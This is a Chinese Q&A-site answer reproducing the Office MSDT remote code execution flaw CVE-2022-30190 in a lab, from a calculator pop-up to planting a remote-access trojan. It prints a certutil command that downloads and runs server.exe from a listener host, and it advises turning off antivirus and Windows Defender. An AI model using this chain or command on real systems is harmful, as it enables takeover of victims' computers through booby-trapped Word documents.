office CVE-2022-30190漏洞复现过程

发布网友 发布时间:2024-09-27 14:25

我来回答

1个回答

热心网友 时间:2024-11-10 04:27

简介: 用户在点击word等应用程序时,会通过URL协议调用MSDT并启动msdt.exe程序,导致远程代码执行漏洞。攻击者可构造恶意word文档诱骗点击,进而黑入系统。

0x01 环境部署

1. 测试版本:Microsoft Office LTSC 专业增强版 2021

2. 测试系统:windows 10 教育版

0x02 尝试执行calc弹出计算器

1. 利用脚本生成带有恶意请求的word文件。

2. 在本机开启监听,受害者打开word时访问恶意文件。

3. 将word文件复制到虚拟机打开,发现打开word的同时,系统执行了calc命令打开计算器。

0x03 尝试获取系统权限

1. 利用大灰狼生成远控程序,放置于监听目录下。

2. 生成携带新命令的恶意word文件。

certutil -urlcache -split -f http://192.168.2.1/server.exe c:\\server.exe & c:\\server.exe

此命令表示利用windows自带的命令certutil远程下载并执行本地远控程序。

3. 将文件复制到虚拟机打开,本机开启监听服务。

可以看到主机已上线,可执行系统命令。

注意事项:由于未进行免杀处理,需关闭杀软和Windows Defender。

可尝试其他Office版本和系统。

可尝试使用wget、curl等Windows下载命令。

win10已测试,其他系统可尝试。

相关脚本软件和教程可参考b站视频。 bilibili.com/video/BV1L...

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com